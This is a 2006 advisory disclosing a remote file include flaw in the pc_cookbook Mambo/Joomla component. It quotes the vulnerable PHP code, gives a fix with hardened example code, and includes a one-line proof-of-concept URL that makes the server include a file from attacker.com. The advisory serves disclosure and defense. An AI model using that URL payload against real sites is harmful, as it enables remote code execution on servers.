\_   _____/\_   ___ \ /   |   \\_____  \

 |    __)_ /    \  \//    ~    \/   |   \

 |        \\     \___\    Y    /    |    \

/_______  / \______  /\___|_  /\_______  /

        \/         \/       \/         \/

 

                                        .OR.ID

ECHO_ADV_37$2006


-----------------------------------------------------------------------------------------------


[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities

-----------------------------------------------------------------------------------------------


 

Author          : Ahmad Maulana a.k.a Matdhule

Date            : July 10th 2006

Location        : Indonesia, Jakarta

Web             : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt

Critical Lvl    : Highly critical

Impact          : System access

Where           : From Remote

------------------------------------------------------------------------


 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pc_cookbook Component

 

Application     : pc_cookbook Component

version         : 0.3

URL             : http://www.dianthos.net & http://www.fisheye.gr/koyansblog

 

------------------------------------------------------------------------


 

Vulnerability:

~~~~~~~~~~~~~~~

 

In the folder com_pccookbook we found a vulnerable script, pccookbook.php.

 

-----------------------pccookbook.php----------------------

....

<?php
//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;

// include language file, or default to english
if (file_exists ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {
    include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');
} else {
    include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/english.php');
} // end if
?>

...

----------------------------------------------------------

 

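The variable $mosConfig_absolute_path is not properly sanitized. When
register_globals=on and allow_url_fopen=on, an attacker can exploit this
vulnerability with a simple PHP injection script: a direct request to
pccookbook.php can set the variable from the query string, and the value
is then passed to include_once.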

 

Proof Of Concept:

~~~~~~~~~~~~~~~~

 

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

 

Solution:

~~~~~~~~

 

Sanitize the variable $mosConfig_absolute_path in pccookbook.php.
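
One way to apply this fix, as an added example that is not the component author's code. It assumes the component is loaded through the Mambo/Joomla 1.0 entry script, which defines the _VALID_MOS constant; the language-name pattern and the error messages are illustrative choices.

```php
<?php
// Hardened opening for pccookbook.php (added example, not the original code).

// 1. Refuse direct requests. Assumption: the CMS entry script (index.php)
//    defines _VALID_MOS before it loads any component, so a request that
//    goes straight to this file stops here, before any include is reached.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Use the values the CMS configuration set, as the original code does.
global $mosConfig_absolute_path, $mosConfig_lang;

// 3. Resolve the language directory on the local filesystem. realpath()
//    works on local paths only and returns false when the path does not
//    exist, so a URL value never reaches include_once.
$langDir = realpath($mosConfig_absolute_path . '/components/com_pccookbook/languages');
if ($langDir === false || !is_dir($langDir)) {
    die('Invalid component path.');
}

// 4. Accept only a plain language name (no slashes, dots or URL schemes);
//    anything else falls back to english, matching the original default.
$lang = (isset($mosConfig_lang) && preg_match('/^[A-Za-z0-9_-]+$/', $mosConfig_lang))
    ? $mosConfig_lang
    : 'english';

$langFile = $langDir . '/' . $lang . '.php';
if (!is_file($langFile)) {
    $langFile = $langDir . '/english.php';
}
include_once $langFile;

// Server side: register_globals=Off and allow_url_fopen=Off in php.ini
// remove the two preconditions this advisory names.
?>
```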

 

 

------------------------------------------------------------------------

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

Contact:

~~~~~~~

 

     matdhule[at]gmail[dot]com

     

-------------------------------- [ EOF ]----------------------------------

 

